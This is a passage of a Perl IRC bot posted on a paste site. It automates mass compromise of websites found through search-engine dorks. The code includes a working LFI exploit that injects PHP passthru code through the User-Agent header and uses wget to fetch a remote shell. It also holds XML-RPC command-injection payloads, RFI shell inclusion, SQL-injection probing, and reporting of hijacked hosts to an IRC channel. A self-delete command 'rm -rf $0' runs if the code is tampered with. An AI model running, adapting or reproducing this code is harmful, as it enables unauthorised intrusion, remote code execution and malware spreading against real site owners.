  789.         if ($re  =~ /DOCUMENT_ROOT=\// && $re =~ /HTTP_USER_AGENT/){
  790.             if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  791.                 my $rspo = lfiexploit($xpl,"uname -svnrp;echo J13mb0T;id");
  792.                 $rspo =~ s/\n//g;
  793.                 if ($rspo =~ /j13mb0t#(.*)J13mb0Tuid=(.*)#j13mb0t/sg) {
  794.                     my ($sys,$uid) = ($1,$2);
  795.                     my $tmp = "/tmp/cmd".int rand(2010);
  796.                     my $upload = lfiexploit($xpl,"wget $rspo_shell -O $tmp;$lfispread"); sleep(1);
  797.                     my $res = getcontent("http://".$lfitarget.$bugz.$lfi.$tmp.'%00');
  798.                     if ($res =~ /BaMbY/) {
  799.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3LFI15)(4@3$engz15)15(13@12PHPSheLL15)4 http://".$lfitarget."12".$bugz."6".$lfi."7".$tmp."%00 15(7@3".$sys."15)");
  800.                         sendraw($IRC_cur_socket, "PRIVMSG BaMbY :15(4@3LFI15)(4@3$engz15)15(13@12PHPSheLL15)4 http://".$lfitarget."12".$bugz."6".$lfi."7".$tmp."%00 15(7@3".$sys."15)");
  801.                     }
  802.                     else {
  803.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3LFI15)(4@3$engz15)15(13@12System15)4 http://".$lfitarget."12".$bugz."6[LFI] 15(7@3".$sys." 7uid=".$uid."15)");
  804.                         sendraw($IRC_cur_socket, "PRIVMSG BaMbY :15(4@3LFI15)(4@3$engz15)15(13@12System15)4 http://".$lfitarget."12".$bugz."6[LFI] 15(7@3".$sys." 7uid=".$uid."15)");
  805.                     }
  806.                 }
  807.                 else {
  808.                     sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3LFI15)(4@3$engz15)15(13@12Vuln15)4 ".$vuln." 15");
  809.                     sendraw($IRC_cur_socket, "PRIVMSG BaMbY :15(4@3LFI15)(4@3$engz15)15(13@12Vuln15)4 ".$vuln." 15");
  810.                 }
  811.             } exit } sleep(3);
  812.         }
  813.     }
  814. }
  815.  
  816. sub cmdxml() {
  817. my $jed = $_[0];
  818. my $dwa = $_[1];
  819. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
  820.         $exploit = "<?xml version=\"1.0\"?><methodCall>";
  821.         $exploit .= "<methodName>test.method</methodName>";
  822.         $exploit .= "<params><param><value><name>',''));";
  823.         $exploit .= "echo'bamby';echo`".$dwa."`;echo'solo';exit;/*</name></value></param></params></methodCall>";
  824. my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
  825. if ($response->content =~ /bamby(.*)solo/s) {
  826. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3XMLCMD15)4 $1");
  827. }
  828. }
  829.  
  830. sub xmlscan() {
  831.     my $engz = $_[0];
  832.     my $bugz = $_[1];
  833.     my $dork = $_[2];
  834.     my $contatore = 0;    
  835.     if ($engz =~ /GooGLe/) {
  836.         my @xmlgoogle=&google($dork);
  837.         push(@xmltotal, @xmlgoogle);
  838.         }
  839.     if ($engz =~ /AllTheWeb/) {
  840.         my @xmlalltheweb=&alltheweb($dork);
  841.         push(@xmltotal, @xmlalltheweb);
  842.     }
  843.     if ($engz =~ /Bing/) {
  844.         my @xmlBing=&Bing($dork);
  845.         push(@xmltotal, @xmlBing);
  846.     }
  847.     if ($engz =~ /ALtaViSTa/) {
  848.         my @xmlaltavista=&altavista($dork);
  849.         push(@xmltotal, @xmlaltavista);
  850.     }
  851.     if ($engz =~ /AsK/) {
  852.         my @xmlask=&ask($dork);
  853.         push(@xmltotal, @xmlask);
  854.     }
  855.     if ($engz =~ /UoL/) {
  856.         my @xmluol=&uol($dork);
  857.         push(@xmltotal, @xmluol);
  858.     }
  859.     if ($engz =~ /YahOo/) {
  860.         my @xmlyahoo=&yahoo($dork);
  861.         push(@xmltotal, @xmlyahoo);
  862.     }
  863.     my @xmlclean = &calculate(@xmltotal);
  864.     if (scalar(@xmlclean) != 0) {
  865.     }
  866.     my $uni=scalar(@xmlclean);
  867.     foreach my $xmltarget (@xmlclean)
  868.     {
  869.         $contatore++;
  870.         if ($contatore==$uni-1){
  871.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3XML15)(4@3$engz15)10 Scan Finish for14 $dork");
  872.         }
  873.         my $xpl = "http://".$xmltarget.$bugz;
  874.         my $strona = getcontent($xpl);
  875.         if ( $strona =~ /faultCode/ ) {
  876.             xmlcek($xpl);
  877.             xmlvuln($xpl);
  878.             xmlxspread($xpl,$xmlspread);
  879.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3XML15)(2$shellx15)14 $os ");
  880.             sendraw($IRC_cur_socket, "PRIVMSG BaMbY :15(4@3XML15)(2$shellx15)14 $os ");
  881.             }
  882.     }
  883. }
  884.  
  885. sub rfiscan() {
  886.     my $engz = $_[0];
  887.     my $bugz = $_[1];
  888.     my $dork = $_[2];
  889.     my $contatore = 0;    
  890.     if ($engz =~ /GooGLe/) {
  891.         my @rfigoogle=&google($dork);
  892.         push(@rfitotal, @rfigoogle);
  893.         }
  894.     if ($engz =~ /AllTheWeb/) {
  895.         my @rfialltheweb=&alltheweb($dork);
  896.         push(@rfitotal, @rfialltheweb);
  897.     }
  898.     if ($engz =~ /Bing/) {
  899.         my @rfiBing=&Bing($dork);
  900.         push(@rfitotal, @rfiBing);
  901.     }
  902.     if ($engz =~ /ALtaViSTa/) {
  903.         my @rfialtavista=&altavista($dork);
  904.         push(@rfitotal, @rfialtavista);
  905.     }
  906.     if ($engz =~ /AsK/) {
  907.         my @rfiask=&ask($dork);
  908.         push(@rfitotal, @rfiask);
  909.     }
  910.     if ($engz =~ /UoL/) {
  911.         my @rfiuol=&uol($dork);
  912.         push(@rfitotal, @rfiuol);
  913.     }
  914.     if ($engz =~ /YahOo/) {
  915.         my @rfiyahoo=&yahoo($dork);
  916.         push(@rfitotal, @rfiyahoo);
  917.     }
  918.     my @rficlean = &calculate(@rfitotal);
  919.     if (scalar(@rficlean) != 0) {
  920.     }
  921.     my $uni=scalar(@rficlean);
  922.     foreach my $rfitarget (@rficlean)
  923.     {
  924.         $contatore++;
  925.         if ($contatore==$uni-1){
  926.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3RFI15)(4@3$engz15)10 Scan Finish for14 $dork");
  927.         }
  928.         my $rfixpl  = "http://".$rfitarget.$bugz.$rfiid;
  929.         my $rfispd  = "http://".$rfitarget.$bugz.$rfispread;
  930.         my $inj     = "http://".$rfitarget."12".$bugz."7[PHP-SHELL]?";
  931.         my $re   = getcontent($rfixpl);
  932.         if ($re  =~ /BaMbY/){
  933.             getcontent($rfispd);
  934.             os($rfixpl);
  935.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3RFI15)2$inj14 $os");
  936.             sendraw($IRC_cur_socket, "PRIVMSG BaMbY :15(4@3RFI15)2$inj14 $os");
  937.             }
  938.     }
  939. }
  940. sub sqlscan() {
  941.     my $engz = $_[0];
  942.     my $bugz = $_[1];
  943.     my $dork = $_[2];
  944.     my $contatore = 0;    
  945.     if ($engz =~ /GooGLe/) {
  946.         my @sqlgoogle=&google($dork);
  947.         push(@sqltotal, @sqlgoogle);
  948.         }
  949.     if ($engz =~ /AllTheWeb/) {
  950.         my @sqlalltheweb=&alltheweb($dork);
  951.         push(@sqltotal, @sqlalltheweb);
  952.     }
  953.     if ($engz =~ /Bing/) {
  954.         my @sqlBing=&Bing($dork);
  955.         push(@sqltotal, @sqlBing);
  956.     }
  957.     if ($engz =~ /ALtaViSTa/) {
  958.         my @sqlaltavista=&altavista($dork);
  959.         push(@sqltotal, @sqlaltavista);
  960.     }
  961.     if ($engz =~ /AsK/) {
  962.         my @sqlask=&ask($dork);
  963.         push(@sqltotal, @sqlask);
  964.     }
  965.     if ($engz =~ /UoL/) {
  966.         my @sqluol=&uol($dork);
  967.         push(@sqltotal, @sqluol);
  968.     }
  969.     if ($engz =~ /YahOo/) {
  970.         my @sqlyahoo=&yahoo($dork);
  971.         push(@sqltotal, @sqlyahoo);
  972.     }
  973.     my @sqlclean = &calculate(@sqltotal);
  974.     if (scalar(@sqlclean) != 0) {
  975.     }
  976.     my $uni=scalar(@sqlclean);
  977.     foreach my $sqltarget (@sqlclean)
  978.     {
  979.         $contatore++;
  980.         if ($contatore==$uni-1){
  981.         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)(4@3$engz15)10 Scan Finish for14 $dork");
  982.         }
  983.         my $xpl = "http://".$sqltarget.$bugz."'";
  984.         my $vuln = "http://".$sqltarget."12".$bugz."7[SQL]";
  985.         my $strona = getcontent($xpl);
  986.         if ( $strona =~ m/You have an error in your SQL syntax/i || $strona =~ m/Query failed/i || $strona =~ m/SQL query failed/i )
  987.         {sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)(2MySQL15)14 $vuln ");}
  988.         elsif ( $strona =~ m/ODBC SQL Server Driver/i || $strona =~ m/Unclosed quotation mark/i || $strona =~ m/Microsoft OLE DB Provider for/i )
  989.         {sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)(2MsSQL15)14 $vuln ");}
  990.         elsif ( $strona =~ m/Microsoft JET Database/i || $strona =~ m/ODBC Microsoft Access Driver/i )
  991.         {sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)(2MsAccess15)14 $vuln ");}
  992.     }
  993. }
  994. sub enc()
  995. {
  996.    my $md5_hash = $1;
  997.    my $md5_generated = md5_hex($md5_hash);
  998.    sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3md5 Encode15)2 $md5_generated");
  999. }
  1000. sub dec()
  1001. {
  1002.    my $md5 = $1;
  1003.    my $crac = 'http://md5.noisette.ch/md5.php?hash='.$md5;
  1004.    my $found = getcontent($crac);
  1005.       if    ($found =~ /<string><!\[CDATA\[(.*)\]\]><\/string>/)
  1006.             {
  1007.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3md5 Decode15)2 $1");
  1008.             }
  1009.       else
  1010.             {
  1011.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3md5 Decode15)2 $1");
  1012.             }
  1013. }
  1014. sub xmlcek {
  1015. my $xmltgt = $_[0];
  1016. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
  1017.         $exploit = "<?xml version=\"1.0\"?><methodCall>";
  1018.         $exploit .= "<methodName>test.method</methodName>";
  1019.         $exploit .= "<params><param><value><name>',''));";
  1020.         $exploit .= "echo'j13mb0t';echo`uname -a`;echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
  1021. my $response = $userAgent->request(POST $xmltgt, Content_Type => 'text/xml', Content => $exploit);
  1022. if ($response->content =~ /j13mb0t(.*)j13mb0t/s) {
  1023. $os=$1;
  1024. }}
  1025. sub xmlvuln {
  1026. my $xmltargt = $_[0];
  1027. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
  1028.         $exploit = "<?xml version=\"1.0\"?><methodCall>";
  1029.         $exploit .= "<methodName>test.method</methodName>";
  1030.         $exploit .= "<params><param><value><name>',''));";
  1031.         $exploit .= "echo 'J1mb0'.'T';exit;/*</name></value></param></params></methodCall>";
  1032. my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
  1033. if ($response->content =~ /J1mb0T/) {
  1034. $shellx=$xmltargt;
  1035. }}
  1036. sub xmlxspread() {
  1037. my $xmltargt = $_[0];
  1038. my $xmlsprd = $_[1];
  1039. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
  1040.         $exploit = "<?xml version=\"1.0\"?><methodCall>";
  1041.         $exploit .= "<methodName>test.method</methodName>";
  1042.         $exploit .= "<params><param><value><name>',''));";
  1043.         $exploit .= "echo'j13m';echo`".$xmlsprd."`;echo'b0T';exit;/*</name></value></param></params></methodCall>";
  1044. my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
  1045. }
  1046.  
  1047. sub getcontent() {
  1048.     my $url = $_[0];
  1049.     my $req = HTTP::Request->new(GET => $url);
  1050.     my $ua  = LWP::UserAgent->new();
  1051.     $ua->timeout(15);
  1052.     my $response = $ua->request($req);
  1053.     return $response->content;
  1054. }
  1055.  
  1056. sub lfiexploit() {
  1057.     my $url = $_[0];
  1058.     my $rce = $_[1];
  1059.     my $agent = "<?php echo \"j13mb0t#\"; passthru(\'".$rce."\'); echo \"#j13mb0t\"; ?>";
  1060.     my $ua = LWP::UserAgent->new(agent => $agent);
  1061.     $ua->timeout(15);
  1062.     my $req = HTTP::Request->new(GET => $url);
  1063.     my $response = $ua->request($req);
  1064.     return $response->content;
  1065. }
  1066.  
  1067. sub google(){
  1068.     my @lst;
  1069.     my $key = $_[0];
  1070.     my $b   = 0;
  1071.     for ($b=0; $b<=1000; $b+=100){
  1072.         my $Go=("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$b);
  1073.         my $Res=query($Go);
  1074.         while ($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
  1075.             if ($1 !~ /google/){
  1076.                 my $k=$1;
  1077.                 my @grep=links($k);
  1078.                 push(@lst,@grep);
  1079.             }
  1080.         }
  1081.     }
  1082. return @lst;
  1083. }
  1084. sub SIGN() {
  1085. if (($powered !~ /M/)||($mail !~ /web/)) {
  1086. print "\nLamer!!! Bodoh ToloL Oon !!! Udah Gak Usah diRubah Lagi!!!\n\n";
  1087. exec("rm -rf $0 && pkill perl");
  1088. }
  1089. }
  1090. sub alltheweb() {
  1091.     my @lst;
  1092.     my $key = $_[0];
  1093.     my $b   = 0;
  1094.     my $pg  = 0;
  1095.     for ($b=0; $b<=1000; $b+=100) {
  1096.         my $all = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$b);
  1097.         my $Res = query($all);
  1098.         while ( $Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g ) {
  1099.             my $k = $1;
  1100.             $k =~ s/ //g;
  1101.             my @grep = links($k);
  1102.             push( @lst, @grep );
  1103.         }
  1104.     }
  1105.     return @lst;
  1106. }
  1107.  
  1108. sub uol() {
  1109.     my @lst;
  1110.     my $key = $_[0];
  1111.     my $b   = 0;
  1112.     for ($b=1; $b<=1000; $b+=10) {
  1113.         my $UoL = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$b);
  1114.         my $Res = query($UoL);
  1115.         while ( $Res =~ m/<a href=\"http:\/\/([^>\"]*)/g ) {
  1116.             my $k = $1;
  1117.             if ( $k !~ /busca|uol|yahoo/ ) {
  1118.                 my $k    = $1;
  1119.                 my @grep = links($k);
  1120.                 push( @lst, @grep );
  1121.             }
  1122.         }
  1123.     }
  1124.     return @lst;
  1125. }
  1126.  
  1127. sub Bing() {
  1128.     my @lst;
  1129.     my $key = $_[0];
  1130.     my $b   = 0;
  1131.     for ($b=1; $b<=1000; $b+=10) {
  1132.         my $bing = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$b."&FORM=PERE");
  1133.         my $Res = query($bing);
  1134.         while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
  1135.             if ( $1 !~ /msn|live|bing/ ) {
  1136.                 my $k    = $1;
  1137.                 my @grep = links($k);
  1138.                 push( @lst, @grep );
  1139.             }
  1140.         }
  1141.     }
  1142.     return @lst;
  1143. }
  1144.  
  1145. sub altavista(){
  1146.     my @lst;
  1147.     my $key = $_[0];
  1148.     my $b   = 0;
  1149.     for ($b=1; $b<=1000; $b+=10){
  1150.         my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
  1151.         my $Res=query($AlT);
  1152.         while ($Res=~m/<span class=ngrn>(.+?)\//g){
  1153.             if ($1 !~ /altavista/){
  1154.                 my $k=$1;
  1155.                 $k=~s/<//g;
  1156.                 $k=~s/ //g;
  1157.                 my @grep=links($k);
  1158.                 push(@lst,@grep);
  1159.             }
  1160.         }
  1161.     }
  1162. return @lst;
  1163. }
  1164.  
  1165. sub ask() {
  1166.     my @lst;
  1167.     my $key = $_[0];
  1168.     my $b   = 0;
  1169.     my $pg  = 0;
  1170.     for ($b=0; $b<=1000; $b+=10) {
  1171.         my $Ask = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$b);
  1172.         my $Res = query($Ask);
  1173.         while ($Res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
  1174.             if ($1 !~ /ask.com/){
  1175.                 my $k = $1;
  1176.                 my @grep = links($k);
  1177.                 push( @lst, @grep );
  1178.             }
  1179.         }
  1180.     }
  1181.     return @lst;
  1182. }
  1183.  
  1184. sub yahoo() {
  1185.     my @lst;
  1186.     my $key = $_[0];
  1187.     my $b   = 0;
  1188.     for ($b=1; $b<=500; $b+=1) {
  1189.         my $yahoo = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$b);
  1190.         my $Res = query($yahoo);
  1191.         while ($Res =~ m/26u=(.*?)%26w=/g) {
  1192.             if ($1 !~ /yahoo/){
  1193.                 my $k = $1;
  1194.                 my @grep = links($k);
  1195.                 push(@lst, @grep);
  1196.             }
  1197.         }
  1198.     }
  1199.     return @lst;
  1200. }
  1201. sub os() {
  1202.     my $target=$_[0];
  1203.     my $re  = &query($target);
  1204.     while ($re =~ m/<br>OSTYPE:(.+?)\<br>/g) {
  1205.         $os = $1;
  1206.     }
  1207. }
  1208.  
  1209. sub query($) {
  1210. my $url = $_[0];
  1211. $url =~ s/http:\/\///;
  1212. my $host  = $url;
  1213. my $query = $url;
  1214. my $page  = "";
  1215. $host  =~ s/href=\"?http:\/\///;
  1216. $host  =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  1217. $query =~ s/$host//;
  1218. if ( $query eq "" ) { $query = "/"; }
  1219. eval {
  1220. my $sock = IO::Socket::INET->new(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or return;
  1221. print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  1222. my @r = <$sock>;
  1223. $page = "@r";
  1224. close($sock);
  1225. };
  1226. return $page;
  1227. }
  1228. sub links() {
  1229.     my @l;
  1230.     my $link = $_[0];
  1231.     my $host = $_[0];
  1232.     my $hdir = $_[0];
  1233.     $hdir =~ s/(.*)\/[^\/]*$/\1/;
  1234.     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  1235.     $host .= "/";
  1236.     $link .= "/";
  1237.     $hdir .= "/";
  1238.     $host =~ s/\/\//\//g;
  1239.     $hdir =~ s/\/\//\//g;
  1240.     $link =~ s/\/\//\//g;
  1241.     push( @l, $link, $host, $hdir );
  1242.     return @l;
  1243. }
  1244. sub key() {
  1245.     my $dork = $_[0];
  1246.     $dork =~ s/ /\+/g;
  1247.     $dork =~ s/:/\%3A/g;
  1248.     $dork =~ s/\//\%2F/g;
  1249.     $dork =~ s/&/\%26/g;
  1250.     $dork =~ s/\"/\%22/g;
  1251.     $dork =~ s/,/\%2C/g;
  1252.     $dork =~ s/\\/\%5C/g;
  1253.     return $dork;
  1254. }
  1255.  
  1256.  
  1257. sub calculate {
  1258.     my @calculate = ();
  1259.     my %visti = ();
  1260.     foreach my $element (@_) {
  1261.         $element =~ s/\/+/\//g;
  1262.         next if $visti{$element}++;
  1263.         push @calculate, $element;
  1264.     }
  1265.     return @calculate;
  1266. }
  1267.  
  1268. sub nick {
  1269.     return unless $#_ == 0;
  1270.     sendraw("NICK $_[0]");
  1271. }
  1272.  
  1273. sub notice {
  1274.     return unless $#_ == 1;
  1275.     sendraw("NOTICE $_[0] :$_[1]");
  1276. }
  1277.  
  1278. sub join {
  1279. sendraw("JOIN $_[0]");
  1280. }
  1281.  
  1282. sub part {
  1283. sendraw("PART $_[0]");
  1284. }
  1285.  
  1286. sub quit {
  1287. sendraw("QUIT $_[0]");
  1288. exit;
  1289. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!